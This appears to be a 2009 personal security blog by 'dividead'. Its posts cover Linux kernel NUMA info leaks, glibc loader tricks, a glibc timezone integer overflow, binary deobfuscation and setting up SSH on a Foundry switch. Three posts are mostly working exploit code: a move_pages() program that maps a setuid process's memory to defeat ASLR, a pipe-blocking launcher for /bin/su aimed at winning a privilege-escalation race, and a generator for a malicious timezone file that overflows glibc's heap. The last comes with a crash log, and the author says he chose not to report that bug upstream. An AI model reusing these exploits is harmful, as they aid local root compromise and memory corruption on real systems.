Dividead's Blog

NUMA and ASLR 2009/08/28

Posted by dividead in Uncategorized.
Tags: ASLR, bug, kernel, linux, NUMA
1 comment so far

In the same link as mentioned in my previous post Tinnes hinted at interesting things to be done with NUMA having CAP_SYS_NICE through, say, pulseaudio.

I have no idea whether this is the issue he was referring to, but if it was then the issue is actually far more usable than he sketched, as the credentials check is rather wide, and this whole thing is reliably usable in local exploits without having to go through the trouble of getting CAP_SYS_NICE.

When checking out the NUMA code in the Linux kernel I found the following interesting case in the move_pages() systemcall defined in mm/migrate.c and meant to move pages between NUMA nodes, but also query the status of pages.

        /*
         * Check if this process has the right to modify the specified
         * process. The right exists if the process has administrative
         * capabilities, superuser privileges or the same
         * userid as the target process.
         */
        rcu_read_lock();
        tcred = __task_cred(task);
        if (cred->euid != tcred->suid && cred->euid != tcred->uid &&
            cred->uid  != tcred->suid && cred->uid  != tcred->uid &&
            !capable(CAP_SYS_NICE)) {
                rcu_read_unlock();
                err = -EPERM;
                goto out;
        }
        rcu_read_unlock();

This credentials check certainly looks interesting, and is easy to pass when we have CAP_SYS_NICE, but there is more. First of all note that tcred specifies the credentials of the remote task, and cred the credentials of the current one. This test is then also passed if the remote uid or saved uid is equal to either our current uid of effective uid. This is easy to satisfy for all setuid root executables, as the uid of the remote executable will start out as the uid of the process that calls execve() on it.

So, if we spawn a process, then we can pass the credentials check in move_pages() and query their status.

Lets whip something up which queries pages through move_pages() to verify this.

/* dividead 2009 */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <syscall.h>

#define MOVE_PAGES_NUM          65536
#define ERROR(x)                ((x) == -EFAULT || (x) == -ENOENT)

int main(int argc, char **argv)
{
        void *address[MOVE_PAGES_NUM];
        int status[MOVE_PAGES_NUM];
        int start_used = 0;
        unsigned int i, j;
        unsigned char *p;
        void *start;
        pid_t pid;

        if (argc != 2) {
                fprintf(stderr, "error\n");
                exit(EXIT_FAILURE);
        }

        pid = atoi(argv[1]);

        do {
                int ret;

                for (i = 0; i < MOVE_PAGES_NUM && p < p + 4096; i++, p += 4096)
                        address&#91;i&#93; = p;

                ret = syscall(__NR_move_pages, pid, i, address, NULL, &status, 0);
                if (ret == -1) {
                        perror("move_pages()");
                        exit(EXIT_FAILURE);
                }

                for (j = 0; j < i; j++) {
                        if (ERROR(status&#91;j&#93;) && start_used) {
                                printf("%p-%p\n", start, address&#91;j&#93;);
                                start_used = 0;
                        } else if (!ERROR(status&#91;j&#93;) && start_used == 0) {
                                start = address&#91;j&#93;;
                                start_used = 1;
                        }
                }
        } while (p > p - 4096);
}

[dividead ~]$ id
uid=500(dividead) gid=500(dividead) groups=500(dividead)
[dividead ~]$ ps aux | grep "su -" | grep -v grep
root     19908  0.0  0.0 130992  1248 pts/3    S+   22:32   0:00 su -
[dividead ~]$ cat /proc/19908/status | grep Uid
Uid:    500     0       0       0
[dividead ~]$ ./numa 19908
0x400860-0x405860
0x407860-0x409860
0x609860-0x60a860
0xdf4860-0xe04860
0x3d71200860-0x3d7121b860
0x3d7121c860-0x3d7121d860
0x3d7141e860-0x3d71420860
...

As I’m running on x86-64 this will still take forever, but given some additional information, such as knowing the three most significant bytes of the address ranges are not mangled by ASLR anyway we can determine where things are mapped pretty decently.

Blocking between execution and main() 2009/07/21

Posted by dividead in Security.
Tags: glibc, rtld
2 comments

Recently http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html was brought to my attention, and I having a bit of spare time on my hands, I decided to investigate a casual remark Tinnes made about forcing a process to block after being executed but before reaching the main() function. In case of the pulseaudio flaw this is useful to exploit the race-condition reliably.

My first thought was that such a block should be easy if we could still have glibc rtld print data to stdout or stderr for diagnostic purposes, and have this print block. First there is the question wether rtld.c still allows us to do such things, and it seems that specifying something silly like the following works:

[dividead ~]$ LD_PRELOAD=foo ping
ERROR: ld.so: object 'foo' from LD_PRELOAD cannot be preloaded: ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination

Now that we found rtld.c generating output before main() is even called, we need to have this block in setuid programs. The easiest way I can think of doing this is by creating a pipe in a parent process, filling this pipe completely without reading it, forking a child which executes the setuid program we target while replacing fd 1 and 2 to the pipe write half.

/* -- dividead 2009 */
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

void fd_set_blocking(int fd)
{
        int flags;

        if ( (flags = fcntl(fd, F_GETFL)) == -1) {
                perror("fcntl()");
                exit(EXIT_FAILURE);
        }

        if (flags & O_NONBLOCK) {
                flags &= ~O_NONBLOCK;
                if (fcntl(fd, F_SETFL, flags) == -1) {
                        perror("fcntl()");
                        exit(EXIT_FAILURE);
                }
        }
}

void fd_set_nonblocking(int fd)
{
        int flags;

        if ( (flags = fcntl(fd, F_GETFL)) == -1) {
                perror("fcntl()");
                exit(EXIT_FAILURE);
        }

        if ( !(flags & O_NONBLOCK) ) {
                flags |= O_NONBLOCK;
                if (fcntl(fd, F_SETFL, flags) == -1) {
                        perror("fcntl()");
                        exit(EXIT_FAILURE);
                }
        }
}

ssize_t xwrite(int fd, const void *buf, size_t count)
{
        ssize_t ret;

        do {
                ret = write(fd, buf, count);
        } while (ret == -1 && errno == EINTR);

        if (ret == -1 && errno != EAGAIN) {
                perror("write()");
                exit(EXIT_FAILURE);
        }

        return ret;
}
int xdup2(int oldfd, int newfd)
{
        int ret;

        if ( (ret = dup2(oldfd, newfd)) == -1) {
                perror("dup2()");
                exit(EXIT_FAILURE);
        }

        return ret;
}

int xputenv(char *string)
{
        int ret;

        if ( (ret = putenv(string)) != 0) {
                perror("putenv()");
                exit(EXIT_FAILURE);
        }

        return ret;
}
int main()
{
        pid_t pid;
        ssize_t ret;
        int pipefd[2];
        char buf[4096];

        /* Create a pipe, we use this to read from the child we spawn. */
        if (pipe(pipefd) == -1) {
                perror("pipe()");
                exit(EXIT_FAILURE);
        }

        /* Set it non-blocking, so we can fill the pipe buffer */
        fd_set_nonblocking(pipefd[1]);

        /* Fill the pipe buffer.  As a small optimization, first use page
         * granularity, then fill out with single bytes until done.
         */
        do {
                ret = xwrite(pipefd[1], buf, 4096);
        } while ( !(ret == -1 && errno == EAGAIN) );

        do {
                ret = xwrite(pipefd[1], buf, 1);
        } while ( !(ret == -1 && errno == EAGAIN) );


        /* Now the pipe is full, causing the child to block when writing
         * to it.  We set it back to blocking again.
         */
        fd_set_blocking(pipefd[1]);
        switch(pid = fork()) {
        case -1:
                perror("fork()");
                exit(EXIT_FAILURE);
        case 0:
                close(pipefd[0]);
                xdup2(pipefd[1], 1);
                xdup2(pipefd[1], 2);
                xputenv("LD_PRELOAD=foo");
                execl("/bin/su", "su", 0);
        default:
                fgetc(stdin);
        }
}

Running this should result in a ‘su’ process owned by root that is blocking in _dl_debug_vdprintf(), giving us ample opportunity to do everything we want, and then start draining the pipe in the parent process. I have no idea wether this was the method found by Tinnes, but it is trivial enough when you think about it for half an hour.

glibc timezone integer overflow 2009/06/01

Posted by dividead in Security.
Tags: glibc, heap overflow, integer overflow, php, Security, udrepper is a goon
1 comment so far

Years ago I found a cute integer overflow in the timezone handling in glibc, but back then I put it on my list of ‘bugs to check out in the future if I have more time’. Of course I never found this time (the density of my blog updates gives a nice impression of my spare time), but was surprised that the problem still exists in recent versions of glibc.

I present it here, as I do not feel like contacting glibc upstream about this issue knowing the maintainer is even more friendly, cooperative, and socially well-adapted than a certain OpenBSD maintainer. http://blog.aurel32.net/?p=47 illustrates this nicely.

Before wasting time of my readers, I want to point out that the impact of this bug is not extensive, and I’d be surprised if someone would manage to make a decent exploit out of this.

The problem is in the __tzfile_read function present in glibc, and a paste of the source code follows. I took the liberty of cutting the irrelevant parts out, to not bother the reader with details.

void
__tzfile_read (const char *file, size_t extra, char **extrap)
{
  ...
  if (file == NULL)
    /* No user specification; use the site-wide default.  */
    file = TZDEFAULT;
  else if (*file == '')
    /* User specified the empty string; use UTC with no leap seconds.  */
    goto ret_free_transitions;
  else
    {
      /* We must not allow to read an arbitrary file in a setuid
         program.  So we fail for any file which is not in the
         directory hierachy starting at TZDIR
         and which is not the system wide default TZDEFAULT.  */
      if (__libc_enable_secure
          && ((*file == '/'
               && memcmp (file, TZDEFAULT, sizeof TZDEFAULT)
               && memcmp (file, default_tzdir, sizeof (default_tzdir) - 1))
              || strstr (file, "../") != NULL))
        /* This test is certainly a bit too restrictive but it should
           catch all critical cases.  */
        goto ret_free_transitions;
    }
  ...
  num_transitions = (size_t) decode (tzhead.tzh_timecnt);
  num_types = (size_t) decode (tzhead.tzh_typecnt);
  chars = (size_t) decode (tzhead.tzh_charcnt);
  num_leaps = (size_t) decode (tzhead.tzh_leapcnt);
  num_isstd = (size_t) decode (tzhead.tzh_ttisstdcnt);
  num_isgmt = (size_t) decode (tzhead.tzh_ttisgmtcnt);
  ...
  total_size = num_transitions * (sizeof (time_t) + 1);
  total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
                & ~(__alignof__ (struct ttinfo) - 1));
  types_idx = total_size;
  total_size += num_types * sizeof (struct ttinfo) + chars;
  total_size = ((total_size + __alignof__ (struct leap) - 1)
                & ~(__alignof__ (struct leap) - 1));
  leaps_idx = total_size;
  total_size += num_leaps * sizeof (struct leap);
  tzspec_len = (sizeof (time_t) == 8 && trans_width == 8
                ? st.st_size - (ftello (f)
                                + num_transitions * (8 + 1)
                                + num_types * 6
                                + chars
                                + num_leaps * 8
                                + num_isstd
                                + num_isgmt) - 1 : 0);

  /* Allocate enough memory including the extra block requested by the
     caller.  */
  transitions = (time_t *) malloc (total_size + tzspec_len + extra);
  if (transitions == NULL)
    goto lose;
  ...
      if (__builtin_expect (fread_unlocked (transitions, trans_width + 1,
                                            num_transitions, f)
                            != num_transitions, 0))
        goto lose;

The first thing I want to point out is the limited scope of this issue. The checks starting on line 17 limit the use of the TZ environment variable (the file parameter to __tzfile_read is derived from the TZ environment variable in other places in the source code), protecting against using arbitrary timezone files in SUID and SGID files. A funny detail is the check on line 21, which does not account for TZ ending with a double-dot, so we’re able to have __tzfile_read open the directory above the default timezone database directory. For the rest something will likely return EISDIR doing this, so it is useless.

Another thing to note is that TZDIR is a variable mentioned in sysdeps/generic/unsecvars.h so we will not be able to use this in SUID or SGID files either. This means that we will not be able to exploit this problem in an easy local situation.

Before continuing, lets look at the bug closely first. In lines 27 through 32 __tzfile_read parses some parameters from a timezone file, and lines 34 through 50 perform some calculations based on them. On line 54 malloc() gets called with parameters which we control, and can easily get to evaluate to 0 or something similar. Finally on line 58 we read the timezone data in this allocated buffer using a variable evaluated in a different way, leading to a perfectly controllable heap overflow.

Code to generate such a trigger follows:

#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <string.h>

#define TZ_MAGIC        "TZif"

#define PUT_32BIT_MSB(cp, value)                                        \
        do {                                                            \
                (cp)[0] = (value) >> 24;                                \
                (cp)[1] = (value) >> 16;                                \
                (cp)[2] = (value) >> 8;                                 \
                (cp)[3] = (value);                                      \
        } while (0)

struct tzhead {
        char    tzh_magic[4];
        char    tzh_version[1];
        char    tzh_reserved[15];
        char    tzh_ttisgmtcnt[4];
        char    tzh_ttisstdcnt[4];
        char    tzh_leapcnt[4];
        char    tzh_timecnt[4];
        char    tzh_typecnt[4];
        char    tzh_charcnt[4];
};

struct ttinfo
  {
    long int offset;
    unsigned char isdst;
    unsigned char idx;
    unsigned char isstd;
    unsigned char isgmt;
  };

int main(void)
{
        struct tzhead evil;
        int i;
        char *p;
        uint32_t total_size;
        uint32_t evil1, evil2;

        /* Initialize static part of the header */
        memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);
        evil.tzh_version[0] = 0;
        memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));
        memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));
        memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));
        memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));
        memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt));

        /* Initialize nasty part of the header */
        evil1 = 500;
        PUT_32BIT_MSB(evil.tzh_timecnt, evil1);

        total_size = evil1 * (sizeof(time_t) + 1);
        total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
                & ~(__alignof__ (struct ttinfo) - 1));

        /* value of chars, to get a malloc(0) */
        evil2 = 0 - total_size;
        PUT_32BIT_MSB(evil.tzh_charcnt, evil2);

        p = (char *)&evil;
        for (i = 0; i < sizeof(evil); i++)
                printf("%c", p&#91;i&#93;);

        /* data we overflow with */
        for (i = 0; i < 50000; i++)
                printf("A");
}
&#91;/sourcecode&#93;

__tzfile_read can be reached through many functions, such as tzset() and localtime() so as an example from a non-s&#91;ug&#93;id file we can use the following:

&#91;sourcecode language='c'&#93;
#include <time.h>

main()
{
        time_t t = time(NULL);
        localtime(&t);
}

[dividead test]$ ./mkevil > evil ; TZ=`pwd`/evil ./a.out *** glibc detected *** ./a.out: free(): invalid next size (fast): 0x000000000192a270 ***

Now that we know for sure this bug is exploitable, we need to determine the cases where this can actually happen. Due to the security checking glibc does the scope is very limited, and we need to have a program which allows us to control either the TZ or the TZDIR environment variables somehow.

A possible example is the old style method to set timezones in PHP assuming it is not running in safe-mode. This was accomplished through putenv(“TZ=/foo/bar/evil”); and funnily PHP will immediatly call tzset() whenever it encounters a putenv() on TZ. This indeed results in PHP crashes, but of course one needs to be able to upload files in the first place, have PHP perform a putenv on data (either completely, in which case we have many more security issues, or on the value part to TZ or TZDIR) we control, and have PHP not running in safe mode.

Maybe more interesting options are possible.

Ramblings on static deobfuscation 2009/03/06

Posted by dividead in Reverse engineering.
Tags: obfuscation
add a comment

The past few days while not at work I have been thinking a bit about binary deobfuscation, as I’m spending some of my spare time cracking an obfuscated binary.

The anti-disassembly and anti-debugging tricks used in this binary are fairly extensive, ranging from jmps in the middle of instructions (why does this still throw IDA pro off guard this much? At least in a graph representation it should be easily possible to follow both execution paths, so that they can be displayed in an intuitive manner), to insertion of redundant code, nanomites all over the place and so on.

The redundant code introduced by their protection scheme is fairly standard though, and come down to inserted ranges of nop-equivalent code. These redundancies can be easily eliminated through static peephole optimizations, which I implemented in a simple IDC script. However, when one thinks about this a bit, peephole optimization to eliminate such code is a fairly unsafe process if the introduced redundant code is more sophisticated.

To illustrate this, I often ran into an instruction pair such as:

        xchg    eax, edx
        xchg    eax, edx

Of course my IDC script quickly eliminated this as redundant code, but now consider the following situation:

        xchg    eax, edx
yadda:
        xchg    eax, edx

Obviously this means we cannot trivially eliminate these xchg pairs as they’re not part of the same basic block. We might be able to eliminate them though if all execution paths leading to ‘yadda’ also contain an instruction such as xchg eax, edx. This is already less trivial, but addressable by static analysis tools.

But how about the situation where the disassembler, say IDA, cannot find a cross reference to yadda in the first place? I.e. when yadda is a dynamically calculated target? This would mean that my script (and likely others that focus on static reduction of redundant code) will eliminate these instructions without a second thought, making it a destructive operation.

Now forceful construction of such situations is also doable; suppose at some point in the original program there is a xchg eax, edx instruction, we could decide to create a stub function in the program containing only assumed noop codes, par examplum the following:

yadda:
        add     eax, 10
        sub     eax, 20
        lea     eax, [eax+10]
        pushf
        test    eax, 0xbadc0de
        popf
        xchg    eax, edx
        xchg    eax, edx
        and     edx, 0xFFFFFFFF
        ret

This would appear like a function containing only redundant code, and we could insert calls to it in many places, which deobfuscators would likely eliminate altogether with the function. But if we start replacing xchg eax, edx instructions in our original program with dynamically calculated call instructions to the second xchg instruction in the function such an elimination would be a destructive operation.

This example presented such a trick by abusing two instructions in a row, but it may also be possible to perform this trick when an instruction with multiple bytes is involved, where for instance the operand is an instruction itself. Consider:

yadda:
        and    esi, esi

Dynamically branching to yadda + 1 (which by the way is 0xF6 — the opcode for div) will also wreak havoc on unsuspecting redundancy elimination. Pure static analysis of binaries containing these tricks seems a fairly inadequate approach to me.

Foundry SuperX SSH authentication 2009/03/02

Posted by dividead in Networking.
Tags: braindead design, foundry
1 comment so far

Today a new Foundry FastIron SuperX Premium switch was delivered at my work, so of course I took the opportunity to play around with it.

Setting up ssh public-key authentication to login to the management cli was one of my goals, as being a programmer I’m bored with repetitive tasks such as typing the same password over and over again.

Sadly, this process was far more messy than one could hope for — especially when comparing it to Juniper routers which allows you to copy paste an OpenBSD style public-key directly into the configuration, and which just works afterwards.

The firmware version I worked with was the following, in order to see wether your mileage may vary.
Compressed Pri Code size = 3811736, Version 04.0.01aT3e3 (SXR04001a.bin) Compressed Sec Code size = 3156827, Version 04.0.01aT3e1 (SXL04001a.bin) Compressed BootROM Code size = 524288, Version 04.0.00T3e5

First we need to create a user account, and allow it to be used for local authentication.
username foobar privilege 0 password fnord aaa authentication login default local

Now we need to setup the SSH server itself, by generating a host keypair, and making sure that users need to specify a password when logging in.
ip ssh permit-empty-password no crypto key generate

Please note that setting permit-empty-password to yes turns off password authentication entirely, instead of (what we would intuitively expect) allowing users without a password to login over ssh. This invites for some really messed up ‘secure’ configuration if people do not pay attention.

At this point it should be possible to login through ssh using a password. Ideally I would like to use pubkey based authentication, but sadly the interface allows us to upload public-keys only over TFTP (although scp
seems possible too as long as the management blade has additional PCMCIA flash modules installed).
An additional annoyance is the fact that the firmware only accepts RFC 4716 style keys, so we have to convert any OpenSSH style key by doing the following.
ssh-keygen -e -f id_dsa.pub > id_dsa.pub.ssh2

This file should be offered on a tftp server, so that on the foundry we can import it. According to the documentation these keys are stored on EEPROM immediatly.
ip ssh pub-key-file tftp 1.2.3.4 id_dsa.pub.ssh2

Well, by no means trivial, but finally this should allow for public-key authentication, or not? It seems that as soon as public-key authentication is tried, we suffer from the following message.
Authenticated with partial success.

It seems that after a successful public-key authentication attempt, the Foundry still wants me to perform password authentication, which certainly seems absurd. Of course we can work around this by disallowing password
authentication altogether.
ip ssh password-authentication no

This is suboptimal when we have a combination of users with passwords and public keys, as well as not allowing me to login through ssh with just a password in case I do not have my pubkey at hand…

Well, this part of the Foundry interface seems more braindead than the average Resident Evil denizen…

First post! 2009/01/30

Posted by dividead in Uncategorized.
add a comment

Welcome to a blog dedicated to all my technical ramblings, from computer security to ren’ai and bishoujo game internals.

I will periodically post about reverse engineering work I did in my spare time for various game engines, my views on computer security, or my ramblings in general if I feel like it.

Dividead’s Blog

NUMA and ASLR 2009/08/28

Blocking between execution and main() 2009/07/21

glibc timezone integer overflow 2009/06/01

Ramblings on static deobfuscation 2009/03/06

Foundry SuperX SSH authentication 2009/03/02

First post! 2009/01/30

Categories

Archive

Feeds

Dividead’s Blog

NUMA and ASLR 2009/08/28

Blocking between execution and main() 2009/07/21

glibc timezone integer overflow 2009/06/01

Ramblings on static deobfuscation 2009/03/06

Foundry SuperX SSH authentication 2009/03/02

First post! 2009/01/30

Categories

Archive

Links

Feeds